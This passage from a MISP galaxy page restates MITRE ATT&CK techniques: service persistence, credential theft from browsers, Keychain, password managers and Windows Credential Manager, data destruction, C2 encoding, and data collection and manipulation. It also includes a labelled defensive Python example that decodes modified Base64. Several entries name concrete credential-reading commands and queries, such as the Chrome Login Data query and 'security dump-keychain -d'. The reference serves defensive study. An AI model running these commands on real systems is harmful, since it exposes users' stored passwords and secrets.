Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.[TechNet Services] Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.

Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API.

Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: .sys) to disk, the payload can be loaded and registered via Native API functions such as CreateServiceW() (or manually via functions such as ZwLoadDriver() and ZwSetValueKey()), by creating the required service Registry values (i.e. Modify Registry), or by using command-line utilities such as PnPUtil.exe.[Symantec W.32 Stuxnet Dossier][Crowdstrike DriveSlayer February 2022][Unit42 AcidBox June 2020] Adversaries may leverage these drivers as Rootkits to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of Exploitation for Privilege Escalation.[ESET InvisiMole June 2020][Unit42 AcidBox June 2020]

Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through Service Execution. To make detection analysis more challenging, malicious services may also incorporate Masquerade Task or Service (ex: using a service and/or payload name related to a legitimate OS or benign software component).

Internal MISP references

UUID 31c6dd3c-3eb2-46a9-ab85-9e8e145810a1 which can be used as unique global reference for Windows Service in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1543.003
Related clusters

To see the related clusters, click here.

Create or Modify System Process

Adversaries may create or modify system-level processes to repeatedly execute malicious payloads as part of persistence. When operating systems boot up, they can start processes that perform background system functions. On Windows and Linux, these system processes are referred to as services.[TechNet Services] On macOS, launchd processes known as Launch Daemon and Launch Agent are run to finish system initialization and load user specific parameters.[AppleDocs Launch Agent Daemons]

Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.

Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.[OSX Malware Detection]

Internal MISP references

UUID f8aa018b-5134-4201-87f2-e55d20f40b17 which can be used as unique global reference for Create or Modify System Process in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Cloud Secrets Management Stores

Adversaries may acquire credentials from cloud-native secret management solutions such as AWS Secrets Manager, GCP Secret Manager, Azure Key Vault, and Terraform Vault.

Secrets managers support the secure centralized management of passwords, API keys, and other credential material. Where secrets managers are in use, cloud services can dynamically acquire credentials via API requests rather than accessing secrets insecurely stored in plain text files or environment variables.

If an adversary is able to gain sufficient privileges in a cloud environment – for example, by obtaining the credentials of high-privileged Cloud Accounts or compromising a service that has permission to retrieve secrets – they may be able to request secrets from the secrets manager. This can be accomplished via commands such as get-secret-value in AWS, gcloud secrets describe in GCP, and az keyvault secret show in Azure.[Permiso Scattered Spider 2023][Sysdig ScarletEel 2.0 2023][AWS Secrets Manager][Google Cloud Secrets][Microsoft Azure Key Vault]

Note: this technique is distinct from Cloud Instance Metadata API in that the credentials are being directly requested from the cloud secrets manager, rather than through the medium of the instance metadata API.

Internal MISP references

UUID 260571a6-3c08-5419-98c5-3fa1aa8e675d which can be used as unique global reference for Cloud Secrets Management Stores in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1555.006
Related clusters

To see the related clusters, click here.

Credentials from Web Browsers

Adversaries may acquire credentials from web browsers by reading files specific to the target browser.[Talos Olympic Destroyer 2018] Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.

For example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\Local\Google\Chrome\User Data\Default\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key.[Microsoft CryptUnprotectData April 2018]

Adversaries have executed similar procedures for common web browsers such as Firefox, Safari, Edge, etc.[Proofpoint Vega Credential Stealer May 2018][FireEye HawkEye Malware July 2017] Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the Windows Credential Manager.

Adversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.[GitHub Mimikittenz July 2016]

After acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).

Internal MISP references

UUID b4a1cbaa-85d1-4a65-977f-494f66a141e3 which can be used as unique global reference for Credentials from Web Browsers in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1555.003
Related clusters

To see the related clusters, click here.

Keychain

Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service.

Keychains can be viewed and edited through the Keychain Access application or using the command-line utility security. Keychain files are located in ~/Library/Keychains/, /Library/Keychains/, and /Network/Library/Keychains/.[Keychain Services Apple][Keychain Decryption Passware][OSX Keychain Schaumann]

Adversaries may gather user credentials from Keychain storage/memory. For example, the command security dump-keychain -d will dump all Login Keychain credentials from ~/Library/Keychains/login.keychain-db. Adversaries may also directly read Login Keychain credentials from the ~/Library/Keychains/login.keychain file. Both methods require a password, where the default password for the Login Keychain is the current user’s password to login to the macOS host.[External to DA, the OS X Way][Empire Keychain Decrypt]

Internal MISP references

UUID 1ef8a053-ff13-4a10-b9d9-0a017880e4a5 which can be used as unique global reference for Keychain in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1555.001
Related clusters

To see the related clusters, click here.

Password Managers

Adversaries may acquire user credentials from third-party password managers.[ise Password Manager February 2019] Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.[ise Password Manager February 2019]

Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.[FoxIT Wocao December 2019][Github KeeThief] Adversaries may extract credentials from memory via Exploitation for Credential Access.[NVD CVE-2019-3610] Adversaries may also try brute forcing via Password Guessing to obtain the master password of a password manager.[Cyberreason Anchor December 2019]

Internal MISP references

UUID 9448cf6f-7ba3-41d1-8710-8e6f9b0572ee which can be used as unique global reference for Password Managers in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1555.005
Related clusters

To see the related clusters, click here.

Securityd Memory

An adversary who obtains root access (allowing them to read securityd’s memory) can then scan through memory to find the correct sequence of keys, in relatively few tries, to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.[OS X Keychain][OSX Keydnap malware]

In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.[OS X Keychain][External to DA, the OS X Way] Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.[OS X Keychain]

Internal MISP references

UUID fd75ec36-fc88-4bee-9fd9-480df6d1e765 which can be used as unique global reference for Securityd Memory in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1555.002
Related clusters

To see the related clusters, click here.

Windows Credential Manager

Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).[Microsoft Credential Manager store][Microsoft Credential Locker]

The Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of Credentials from Web Browsers, Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.

Credential Lockers store credentials in encrypted .vcrd files, located under %SystemDrive%\Users\[Username]\AppData\Local\Microsoft\Vault\ or \Microsoft\Credentials\. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.[passcape Windows Vault][Malwarebytes The Windows Vault]

Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may also gather credentials by directly reading files located inside of the Credential Lockers. Windows APIs, such as CredEnumerateA, may also be abused to list credentials managed by the Credential Manager.[Microsoft CredEnumerate][Delpy Mimikatz Crendential Manager]

Adversaries may also obtain credentials from credential backups. Credential backups and restorations may be performed by running rundll32.exe keymgr.dll KRShowKeyMgr then selecting the “Back up...” button on the “Stored User Names and Passwords” GUI.

Password recovery tools may also obtain plain text passwords from the Credential Manager.[Malwarebytes The Windows Vault]

Internal MISP references

UUID 9503955c-fa53-452a-b717-7e23bfb4df83 which can be used as unique global reference for Windows Credential Manager in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1555.004
Related clusters

To see the related clusters, click here.

Credentials from Password Stores

Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications and services that store passwords to make them easier for users to manage and maintain, such as password managers and cloud secrets vaults. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.

Internal MISP references

UUID a0bb264e-8617-4ae6-bafd-f52b36c63d12 which can be used as unique global reference for Credentials from Password Stores in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data Destruction

Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.[Symantec Shamoon 2012][FireEye Shamoon Nov 2016][Palo Alto Shamoon Nov 2016][Kaspersky StoneDrill 2017][Unit 42 Shamoon3 2018][Talos Olympic Destroyer 2018] Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from Disk Content Wipe and Disk Structure Wipe because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.

Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.[Kaspersky StoneDrill 2017][Unit 42 Shamoon3 2018] In some cases politically oriented image files have been used to overwrite data.[FireEye Shamoon Nov 2016][Palo Alto Shamoon Nov 2016][Kaspersky StoneDrill 2017]

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[Symantec Shamoon 2012][FireEye Shamoon Nov 2016][Palo Alto Shamoon Nov 2016][Kaspersky StoneDrill 2017][Talos Olympic Destroyer 2018]

In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.[Data Destruction - Threat Post][DOJ - Cisco Insider]

Internal MISP references

UUID e5016c2b-85fe-4e6b-917d-0dd5b441cc34 which can be used as unique global reference for Data Destruction in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Non-Standard Encoding

Adversaries may encode data with a non-standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a non-standard data encoding system that diverges from existing protocol specifications. Non-standard data encoding schemes may be based on or related to standard data encoding schemes, such as a modified Base64 encoding for the message body of an HTTP request.[Wikipedia Binary-to-text Encoding][Wikipedia Character Encoding]
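An analyst-side illustration of the modified-Base64 case above: a decoder that maps a recovered custom alphabet back onto standard Base64, and a checker that flags tokens which look like Base64 but do not decode to anything sensible under the standard alphabet. Added example, not code from the MISP galaxy or MITRE; the custom alphabet (the standard one rotated by 13 positions) and the sample token are constructed for it.

```python
"""Decode and spot modified-Base64 payloads (added analyst example, not from
the MISP galaxy or MITRE).

Standard Base64 uses the alphabet A-Z a-z 0-9 + /. A "non-standard" variant
keeps the 6-bits-per-symbol scheme but permutes the alphabet, so the same
bytes produce a token that is valid Base64 syntax yet decodes to garbage
with a normal decoder. That mismatch is what the checker keys on.
"""
import base64
import binascii
import string

STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
# Constructed custom alphabet for the examples: standard alphabet rotated by 13.
CUSTOM_ALPHABET = STD_ALPHABET[13:] + STD_ALPHABET[:13]


def _check_alphabet(alphabet: str) -> None:
    if len(alphabet) != 64 or len(set(alphabet)) != 64:
        raise ValueError("alphabet must be 64 distinct symbols")


def encode_custom_b64(data: bytes, alphabet: str = CUSTOM_ALPHABET) -> str:
    """Base64-encode, then substitute the custom alphabet (used to build samples)."""
    _check_alphabet(alphabet)
    std = base64.b64encode(data).decode("ascii")
    return std.translate(str.maketrans(STD_ALPHABET, alphabet))


def decode_custom_b64(token: str, alphabet: str = CUSTOM_ALPHABET) -> bytes:
    """Map a recovered custom alphabet back to standard Base64 and decode strictly."""
    _check_alphabet(alphabet)
    std = token.translate(str.maketrans(alphabet, STD_ALPHABET))
    return base64.b64decode(std, validate=True)


def classify_token(token: str) -> str:
    """Return 'standard', 'non-standard' or 'not-base64' for one observed token.

    Heuristic: Base64-shaped tokens that fail strict standard decoding, or
    decode to mostly non-text bytes, are candidates for a permuted alphabet.
    Legitimately encoded binary (e.g. gzip bodies) also trips the text check,
    so treat 'non-standard' as a triage signal, not a verdict.
    """
    body = token.rstrip("=")
    if len(token) % 4 or not body or any(c not in STD_ALPHABET for c in body):
        return "not-base64"
    try:
        raw = base64.b64decode(token, validate=True)
    except binascii.Error:
        return "non-standard"
    if not raw:
        return "not-base64"
    text_like = sum(32 <= b < 127 or b in (9, 10, 13) for b in raw) / len(raw)
    return "standard" if text_like > 0.9 else "non-standard"


if __name__ == "__main__":
    # Constructed sample body; "ping!!" is 6 bytes, so no padding is involved.
    sample = b"ping!!"
    custom = encode_custom_b64(sample)
    print(custom, classify_token(custom), decode_custom_b64(custom))
    print(base64.b64encode(sample).decode(), classify_token(base64.b64encode(sample).decode()))
```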

Internal MISP references

UUID 0848222e-ddc2-489e-8ea4-e19634f6af34 which can be used as unique global reference for Non-Standard Encoding in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1132.002
Related clusters

To see the related clusters, click here.

Standard Encoding

Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.[Wikipedia Binary-to-text Encoding][Wikipedia Character Encoding] Some data encoding systems may also result in data compression, such as gzip.

Internal MISP references

UUID 972f0311-aec5-4fb5-bc5b-504c3f0cc95c which can be used as unique global reference for Standard Encoding in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1132.001
Related clusters

To see the related clusters, click here.

Data Encoding

Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.[Wikipedia Binary-to-text Encoding][Wikipedia Character Encoding] Some data encoding systems may also result in data compression, such as gzip.

Internal MISP references

UUID 7d8af4f3-7d8e-4ef2-b828-40a910fc6188 which can be used as unique global reference for Data Encoding in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data Encrypted for Impact

Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.[US-CERT Ransomware 2016][FireEye WannaCry 2017][US-CERT NotPetya 2017][US-CERT SamSam 2018]

In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as File and Directory Permissions Modification or System Shutdown/Reboot, in order to unlock and/or gain access to manipulate these files.[CarbonBlack Conti July 2020] In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.[US-CERT NotPetya 2017]

To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[FireEye WannaCry 2017][US-CERT NotPetya 2017] Encryption malware may also leverage Internal Defacement, such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").[NHS Digital Egregor Nov 2020]

In cloud environments, storage objects within compromised accounts may also be encrypted.[Rhino S3 Ransomware Part 1]

Internal MISP references

UUID f0c36d24-263c-4811-8784-f716c77ec6b3 which can be used as unique global reference for Data Encrypted for Impact in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['IaaS', 'Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data from Cloud Storage

Adversaries may access data from cloud storage.

Many IaaS providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. Similarly, SaaS enterprise platforms such as Office 365 and Google Workspace provide cloud-based document storage to users through services such as OneDrive and Google Drive, while SaaS application providers such as Slack, Confluence, Salesforce, and Dropbox may provide cloud storage solutions as a peripheral or primary use case of their platform.

In some cases, as with IaaS-based cloud storage, there exists no overarching application (such as SQL or Elasticsearch) with which to interact with the stored objects: instead, data from these solutions is retrieved directly through the Cloud API. In SaaS applications, adversaries may be able to collect this data directly from APIs or backend cloud storage objects, rather than through their front-end application or interface (i.e., Data from Information Repositories).

Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.[Amazon S3 Security, 2019][Microsoft Azure Storage Security, 2019][Google Cloud Storage Best Practices, 2019] There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions.

This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.[Trend Micro S3 Exposed PII, 2017][Wired Magecart S3 Buckets, 2019][HIPAA Journal S3 Breach, 2017][Rclone-mega-extortion_05_2021]

Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects.

Internal MISP references

UUID 77069b3f-9e42-4f1b-894f-8df568233df2 which can be used as unique global reference for Data from Cloud Storage in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'IaaS', 'Office 365', 'SaaS']
source MITRE
Related clusters

To see the related clusters, click here.

Network Device Configuration Dump

Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or to identify legitimate accounts and credentials for later use.

Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.[US-CERT TA18-106A Network Infrastructure Devices 2018][Cisco Blog Legacy Device Attacks] These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis.

Internal MISP references

UUID 0d5a5921-f643-4032-9a4a-0bb693822c21 which can be used as unique global reference for Network Device Configuration Dump in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1602.002
Related clusters

To see the related clusters, click here.

SNMP (MIB Dump)

Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).

The MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight into their systems, such as system information, hardware descriptions, physical location, and installed software packages.[SANS Information Security Reading Room Securing SNMP Securing SNMP] The MIB may also contain device operational information, including running configuration, routing table, and interface details.

Adversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.[US-CERT-TA18-106A][Cisco Blog Legacy Device Attacks]

Internal MISP references

UUID 8510638d-5be4-4986-a11c-dcbdc729a50f which can be used as unique global reference for SNMP (MIB Dump) in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1602.001
Related clusters

To see the related clusters, click here.

Data from Configuration Repository

Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.

Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.[US-CERT-TA18-106A][US-CERT TA17-156A SNMP Abuse 2017]

Internal MISP references

UUID 97ef6135-47d4-4b91-8783-c0b5f331340e which can be used as unique global reference for Data from Configuration Repository in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Network']
source MITRE
Related clusters

To see the related clusters, click here.

Code Repositories - Duplicate

Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third-party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.

Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop Exploits, while credentials may provide access to additional resources using Valid Accounts.[Wired Uber Breach][Krebs Adobe]

Note: This is distinct from Code Repositories, which focuses on conducting Reconnaissance via public code repositories.

Internal MISP references

UUID fe595943-f264-4d05-a8c7-7afc8985bfc3 which can be used as unique global reference for Code Repositories - Duplicate in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1213.003
Related clusters

To see the related clusters, click here.

Confluence

Adversaries may leverage Confluence repositories to mine valuable information. Often found in development environments alongside Atlassian JIRA, Confluence is generally used to store development-related documentation; however, it may in general contain more diverse categories of useful information, such as:

  • Policies, procedures, and standards
  • Physical / logical network diagrams
  • System architecture diagrams
  • Technical system documentation
  • Testing / development credentials
  • Work / project schedules
  • Source code snippets
  • Links to network shares and other internal resources

Internal MISP references

UUID 3cc64d61-7922-4e08-98ff-b76cb2173830 which can be used as unique global reference for Confluence in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1213.001
Related clusters

To see the related clusters, click here.

Sharepoint

Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. The following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:

  • Policies, procedures, and standards
  • Physical / logical network diagrams
  • System architecture diagrams
  • Technical system documentation
  • Testing / development credentials
  • Work / project schedules
  • Source code snippets
  • Links to network shares and other internal resources

Internal MISP references

UUID 8ac6952d-5add-4cbc-ad39-44943ed3459b which can be used as unique global reference for Sharepoint in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1213.002
Related clusters

To see the related clusters, click here.

Data from Information Repositories

Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives or provide direct access to the target information. Adversaries may also abuse external sharing features to share sensitive documents with recipients outside of the organization.

The following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:

  • Policies, procedures, and standards
  • Physical / logical network diagrams
  • System architecture diagrams
  • Technical system documentation
  • Testing / development credentials
  • Work / project schedules
  • Source code snippets
  • Links to network shares and other internal resources

Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include web-based platforms such as Sharepoint and Confluence, specific services such as Code Repositories, IaaS databases, enterprise databases, and other storage infrastructure such as SQL Server.

Internal MISP references

UUID 08a73f37-a04e-46be-9409-b330cbe291b4 which can be used as unique global reference for Data from Information Repositories in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Google Workspace', 'IaaS', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data from Local System

Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.

Adversaries may do this using a Command and Scripting Interpreter, such as cmd as well as a Network Device CLI, which have functionality to interact with the file system to gather information.[show_run_config_cmd_cisco] Adversaries may also use Automated Collection on the local system.

Internal MISP references

UUID c0e4f97b-f651-493f-9636-6ac2f6fb46fb which can be used as unique global reference for Data from Local System in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Network', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data from Network Shared Drive

Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.

Internal MISP references

UUID 875c5aa3-6ab1-4717-9503-9818ccbad98a which can be used as unique global reference for Data from Network Shared Drive in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Data from Removable Media

Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.

Some adversaries may also use Automated Collection on removable media.

Internal MISP references

UUID ae3f9f0f-af66-424c-bcc8-4fdbd7ef9766 which can be used as unique global reference for Data from Removable Media in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'macOS', 'Windows']
source MITRE
Related clusters

To see the related clusters, click here.

Runtime Data Manipulation

Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.[FireEye APT38 Oct 2018][DOJ Lazarus Sony 2018] By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct Change Default File Association and Masquerading to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

Internal MISP references

UUID 3ec6bb34-4134-40c3-8b67-c0aeceae4471 which can be used as unique global reference for Runtime Data Manipulation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1565.003
Related clusters

To see the related clusters, click here.

Stored Data Manipulation

Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.[FireEye APT38 Oct 2018][DOJ Lazarus Sony 2018] By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

Internal MISP references

UUID d693ca8a-dacf-439e-a16b-5f6b3406a21d which can be used as unique global reference for Stored Data Manipulation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1565.001
Related clusters

To see the related clusters, click here.

Transmitted Data Manipulation

Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.[FireEye APT38 Oct 2018][DOJ Lazarus Sony 2018] By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Manipulation may be possible over a network connection or between system processes where there is an opportunity to deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

Internal MISP references

UUID 70365fab-8531-4a0e-b147-7cabdfdef243 which can be used as unique global reference for Transmitted Data Manipulation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1565.002
Related clusters

To see the related clusters, click here.

Data Manipulation

Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.

The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

Internal MISP references

UUID b77f03e8-f7d0-4d0f-8b79-4642d0fe2709 which can be used as unique global reference for Data Manipulation in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
